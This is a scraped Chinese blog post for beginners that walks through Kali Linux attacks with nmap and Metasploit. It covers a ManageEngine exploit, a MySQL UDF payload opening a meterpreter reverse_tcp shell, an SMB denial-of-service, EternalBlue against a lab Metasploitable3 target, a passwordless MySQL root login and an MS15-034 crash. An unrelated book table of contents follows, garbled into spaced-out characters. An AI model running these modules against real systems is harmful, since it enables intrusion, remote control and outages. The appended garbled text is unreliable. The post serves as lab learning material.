刚入门的黑客是如何进行Kali Linux渗透测试的?

1、攻击windows服务器漏洞

用nmap对网段进行扫描nmap -sP 192.168. 再进行IP扫描。


发现Windows服务器漏洞
步骤:
msfconsole—进入渗透模块


search manageengine-------搜索渗透模块

search reverse_http---------搜索http渗透模块


use
exploit/windows/http/manageeine_connectionid_write--------使用该渗透模块


set rhosts 192.168.


set rport 8022


set LpORT 8080


run -----------------设置攻击目标地址,攻击目标端口,回连的端口号:

2、MYSQL数据库漏洞

nmap 192.168.-----扫描端口漏洞


步骤:
msfconsole-------进入渗透模式


search mysql-------扫描数据库渗透版本


use
exploit/multi/mysql/mysql_udf_payload----------使用该渗透版本进行渗透


show options


set rhosts 192.168.--------设置攻击端口号

set payload
windows/x64/meterpreter/reverse_tcp--------选择该渗透方式进行攻击


run

3、拒绝服务攻击漏洞:

使用nmap 192.168. 对端口号进行扫描发现漏洞

步骤:

msfconsole-------进入渗透模式

search dos/smb/smb-------搜索渗透版本


use
auxiliary/dos/smb/smb_loris-------使用该渗透版本进行攻击

在这里插入图片描述

show options--------

set rhosts 192.168.--------设置攻击端口号

run-----渗透

4.永恒之蓝漏洞复现

漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境:

攻击机:Kali2020.3(IP:192.168.88.143)

靶机:Metasploitable3Win2k8 (IP:192.168.88.140)

复现过程:

1.用nmap执行C段扫描

2.打开MSF

在终端输入如下命令打开MSF终端:

搜索ms17_010模块

这里可以得到几个工具,其中
auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

执行扫描模块


执行ms17_010攻击模块

5.MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.123 –u root

2、登录成功,进入MySQL系统

3、测试效果:

6.http(ms15_034漏洞)

进入msf模块


查看要设置的东西show options

设置攻击ip

攻击前

攻击后,我的是蓝屏1秒后,跳转到立即重启界面

ssh测试

开启端口转发

查看情况

在kali上尝试连接(rdesktop IP)

  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 教 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值